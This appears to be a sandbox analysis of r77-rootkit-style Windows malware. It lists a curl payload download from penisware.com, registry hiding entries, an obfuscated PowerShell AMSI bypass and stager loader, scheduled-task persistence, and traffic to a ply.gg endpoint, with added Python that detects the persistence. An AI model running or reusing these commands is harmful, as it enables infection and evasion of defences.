C:\Windows\system32\curl https://penisware.com/venom/penisware2.exe --output C:\Windows\Resources\$77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-sdchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-sdchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-sdchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-scchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-scchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-scchost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\startup /v wow /d C:\Windows\Resources\$77-penisware2.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\paths /v wow /d C:\Windows\Resources\$77-install.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo y "

C:\Windows\system32\reg.exe

C:\Windows\system32\reg add HKEY_LOCAL_MACHINE\SOFTWARE\$77config\process_names /v wow /d $77-install.exe

C:\Windows\Resources\$77-sdchost.exe

"C:\Windows\Resources\$77-sdchost.exe"

C:\Windows\Resources\$77-scchost.exe

"C:\Windows\Resources\$77-scchost.exe"

C:\Windows\Resources\$77-penisware.exe

"C:\Windows\Resources\$77-penisware.exe"

C:\Windows\Resources\$77-penisware2.exe

"C:\Windows\Resources\$77-penisware2.exe"

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\Resources\$77-install.exe

"C:\Windows\Resources\$77-install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fRpkfPiAoWEH{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NxRCfbzCQiPVFw,[Parameter(Position=1)][Type]$htOeTWhgve)$mOsfbwnsqLV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fle'+[Char](99)+''+'t'+''+[Char](101)+'d'+'D'+'e'+[Char](108)+''+[Char](101)+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+[Char](77)+''+[Char](101)+'m'+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'yDe'+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'eTy'+'p'+'e','C'+'l'+'a'+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+'b'+'l'+'ic'+','+'S'+'e'+'a'+[Char](108)+'ed,'+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+'la'+[Char](115)+'s,'+'A'+'ut'+'o'+''+[Char](67)+''+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$mOsfbwnsqLV.DefineConstructor(''+'R'+'T'+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e'+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NxRCfbzCQiPVFw).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');$mOsfbwnsqLV.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+'k'+'e'+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+'i'+''+'c'+','+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+'New'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$htOeTWhgve,$NxRCfbzCQiPVFw).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'ed');Write-Output $mOsfbwnsqLV.CreateType();}$ZzcpjmtgDDhQn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+'t'+'e'+''+[Char](109)+'.'+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+'s'+'o'+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+'e'+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+'e'+''+[Char](77)+''+'e'+''+'t'+''+'h'+''+[Char](111)+''+[Char](100)+''+'s'+'');$batozsqAwesqjz=$ZzcpjmtgDDhQn.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'ic'+','+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZMNxjthqpOeSuLgUmWY=fRpkfPiAoWEH @([String])([IntPtr]);$DFpSBJIHUSYKXsKObZKMgf=fRpkfPiAoWEH @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XBnSZNJgWfV=$ZzcpjmtgDDhQn.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+'el'+'3'+''+[Char](50)+''+[Char](46)+''+'d'+'l'+[Char](108)+'')));$bihHcKIBTCtPgR=$batozsqAwesqjz.Invoke($Null,@([Object]$XBnSZNJgWfV,[Object](''+[Char](76)+''+[Char](111)+''+'a'+'d'+'L'+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+'y'+''+[Char](65)+'')));$anZRySvjrybvZPMXY=$batozsqAwesqjz.Invoke($Null,@([Object]$XBnSZNJgWfV,[Object](''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'te'+[Char](99)+''+'t'+'')));$JSwBKMs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($bihHcKIBTCtPgR,$ZMNxjthqpOeSuLgUmWY).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'dl'+[Char](108)+'');$frbfRBlHuZIjaJheh=$batozsqAwesqjz.Invoke($Null,@([Object]$JSwBKMs,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+'ca'+[Char](110)+''+'B'+''+[Char](117)+''+'f'+'f'+[Char](101)+''+'r'+'')));$epLQDxCTqo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($anZRySvjrybvZPMXY,$DFpSBJIHUSYKXsKObZKMgf).Invoke($frbfRBlHuZIjaJheh,[uint32]8,4,[ref]$epLQDxCTqo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$frbfRBlHuZIjaJheh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($anZRySvjrybvZPMXY,$DFpSBJIHUSYKXsKObZKMgf).Invoke($frbfRBlHuZIjaJheh,[uint32]8,0x20,[ref]$epLQDxCTqo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+[Char](65)+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+'sta'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp829.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2bce0d73-0c0e-4c8d-afff-048466bba782}

C:\Windows\Resources\$77-penisware2.exe

"C:\Windows\Resources\$77-penisware2.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-penisware" /tr "C:\Users\Admin\AppData\Roaming\$77-penisware.exe"

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Windows\helppane.exe

C:\Windows\helppane.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=528884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=4004,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4732,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --field-trial-handle=5052,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5320,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5456,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --field-trial-handle=5960,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5196,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=6112,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=5928,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6304,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6292,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --field-trial-handle=6288,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=5904 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x258,0x25c,0x260,0x254,0x27c,0x7fffa353ceb8,0x7fffa353cec4,0x7fffa353ced0

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2268,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1916,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=3232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2288,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=3452 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4364,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\124.0.2478.80\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4364,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4420 /prefetch:8

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-scchost.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Users\Admin\AppData\Roaming\$77-penisware.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3508,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4460,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4148 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,306063723597900612,1618431102234461167,262144 --variations-seed-version --mojo-platform-channel-handle=4736 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"
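
The three schtasks invocations in the process list register one task that runs at every logon with the highest run level ($77-sachost) and two tasks that re-launch their binary every minute ($77-scchost and $77-penisware); all three actions point into C:\Users\Admin\AppData\Roaming, and the $77 prefix on the task names, the dropped files and the $77stager registry value is the naming convention the open-source r77 rootkit uses for the artifacts it hides. The Python below is an added example, not code from the report: it parses schtasks command lines into their switches and lists the persistence traits of each task. The first three sample lines are copied from the process list; the fourth is a constructed benign task for contrast, and the list of user-writable path fragments is an illustrative assumption.

```python
import re

# Added example, not from the report: parse schtasks command lines and flag
# the persistence traits they show. Lines 1-3 are copied from the process
# list above; line 4 is a constructed benign task used for contrast.
SAMPLE_CMDLINES = r"""
schtasks /create /f /sc onlogon /rl highest /tn "$77-sachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-sachost.exe"'
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Users\Admin\AppData\Roaming\$77-scchost.exe"
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-penisware" /tr "C:\Users\Admin\AppData\Roaming\$77-penisware.exe"
schtasks /create /sc daily /st 03:00 /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"
""".strip().splitlines()

# A /switch optionally followed by one value; a value never starts with '/'.
OPTION = re.compile(r'''/(\w+)(?:\s+(?!/)("[^"]*"|'[^']*'|\S+))?''')

# Schedule types that fire without any user action (assumed list).
STARTUP_TRIGGERS = {"onlogon", "onstart", "minute", "hourly"}
# Path fragments that an unprivileged user can write to (assumed list).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\public\\")


def _unquote(value: str) -> str:
    # cmd passes '"path"' through; schtasks then sees "path". Strip both layers.
    while len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
        value = value[1:-1]
    return value


def parse_schtasks(cmdline: str) -> dict:
    """Return {switch: value} for one schtasks command line (switch names lower-cased)."""
    return {k.lower(): (_unquote(v) if v else None)
            for k, v in OPTION.findall(cmdline)}


def assess_task(task: dict) -> list:
    """List the persistence traits of a parsed schtasks /create invocation."""
    findings = []
    sc = (task.get("sc") or "").lower()
    rl = (task.get("rl") or "").lower()
    action = task.get("tr") or ""
    name = task.get("tn") or ""
    if rl == "highest":
        findings.append("run level HIGHEST")
    if sc in STARTUP_TRIGGERS:
        findings.append(f"trigger '{sc}' fires without user interaction")
    if sc == "minute" and task.get("mo") == "1":
        findings.append("re-launches the action every minute")
    if any(p in action.lower() for p in USER_WRITABLE):
        findings.append(f"action in a user-writable path: {action}")
    if name.startswith("$77") or action.split("\\")[-1].startswith("$77"):
        findings.append("'$77' name prefix on task or binary")
    return findings


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        task = parse_schtasks(line)
        print(task.get("tn"), "->", assess_task(task) or "no findings")
```

The same parser applies to Sysmon event 1 or 4688 command lines, where the interesting field is the parent: here the tasks are created by cmd.exe and by the dropped $77-penisware2.exe rather than by an installer or an administrator's console.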

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 penisware.com udp
US 104.21.17.92:443 penisware.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.17.92:443 penisware.com tcp
US 104.21.17.92:443 penisware.com tcp
US 8.8.8.8:53 92.17.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 104.21.17.92:443 penisware.com tcp
US 104.21.17.92:443 penisware.com tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 politics-fiber.gl.at.ply.gg udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 teen-modes.gl.at.ply.gg udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 147.185.221.19:42571 tcp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 2.20.12.101:443 bzib.nelreports.net tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 45.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
BE 104.90.25.175:443 www.microsoft.com tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
NL 23.62.61.97:443 th.bing.com udp
NL 23.62.61.97:443 th.bing.com tcp
NL 23.62.61.194:443 th.bing.com tcp
NL 23.62.61.194:443 th.bing.com tcp
NL 23.62.61.97:443 th.bing.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
GB 172.165.61.93:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 147.185.221.19:42571 tcp
NL 23.62.61.194:443 th.bing.com udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 101.12.20.2.in-addr.arpa udp
